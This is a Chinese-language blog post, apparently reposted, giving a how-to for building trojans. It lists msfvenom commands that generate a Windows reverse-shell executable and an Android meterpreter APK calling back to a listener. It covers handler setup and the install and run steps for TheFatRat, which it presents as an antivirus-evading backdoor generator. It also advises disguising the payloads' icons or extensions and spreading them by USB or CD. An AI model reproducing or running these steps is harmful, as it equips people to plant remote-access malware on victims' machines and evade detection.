• Msfvenom木马使用及TheFatRat工具


    msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST=192.168.168.111 LPORT=3333 EXITFUNC=thread -b ‘x00’ -f exe-only -o /root/Desktop/shell1.exe

    msfvenom  -p android/meterpreter/reverse_tcp LHOST=192.168.168.111 LPORT=3333 R>a.apk

    打开msfconsole

    use exploit/multi/handler

    set payload windows/meterpreter/reverset_tcp

    -===========================================

    TheFatRat:Msfvenom免杀后门生成工具

    项目主页

    https://github.com/screetsec/thefatrat

    本工具能使用msfvenom生成后门,程序能够用meterpreter reverse_tcp payload编译C语言程序,并能够绕过杀软。

    自动化metasploit功能

    1. 检查metasploit服务是否启动

    2. 建造Windows, Linux, Android 和Mac的meterpreter reverse_tcp payload

    3. 开启多个meterpreter reverse_tcp监听

    4. searchsploit快速搜索

    5. 免杀

    6. 进入Msfconsole

    自动运行后门

    目标如果没有开启UAC,你就可以这些文件复制到CD或USB。修改图标或者后缀

    安装要求

    1. linux操作系统,推荐Kali Linux 2或Kali 2016.1 rolling / Cyborg / Parrot /

      Dracos / BackTrack / Backbox等

    2. metasploit框架

    3. gcc, i586-mingw32msvc-gcc或i686-w64-mingw32-gcc ( apt-get install

      mingw32 )

    开始使用

    git clone https://github.com/Screetsec/TheFatRat.git

    cd TheFatrat

    apt-get update

    apt-get install mingw32 backdoor-factory

    如果提示没有安装MinGW或无法找到包

    运行

    提取lalin-master to your home or another folder

    chmod +x fatrat

    chmod +x powerfull.sh

    ./fatrat

    然后根据选项输入相应数字

    使用截图

    查毒

    文章出处:MottoIN

  • 相关阅读:
    洛谷P2345 奶牛集会
    洛谷P3531 [POI2012]LIT-Letters
    codevs 4163 hzwer与逆序对
    各种读入方式速度比较
    洛谷P1420 最长连号
    TCPDump:捕获并记录特定协议 / 端口
    linux下抓取网页快照
    Pro Android 4 第五章 理解Intent
    UpdatePanel和jQuery不兼容
    RAC 11.2.0.4 安装 遇到 INS-06001
  • 原文地址:https://www.cnblogs.com/jjj-fly/p/8146296.html
Copyright © 2020-2023  润新知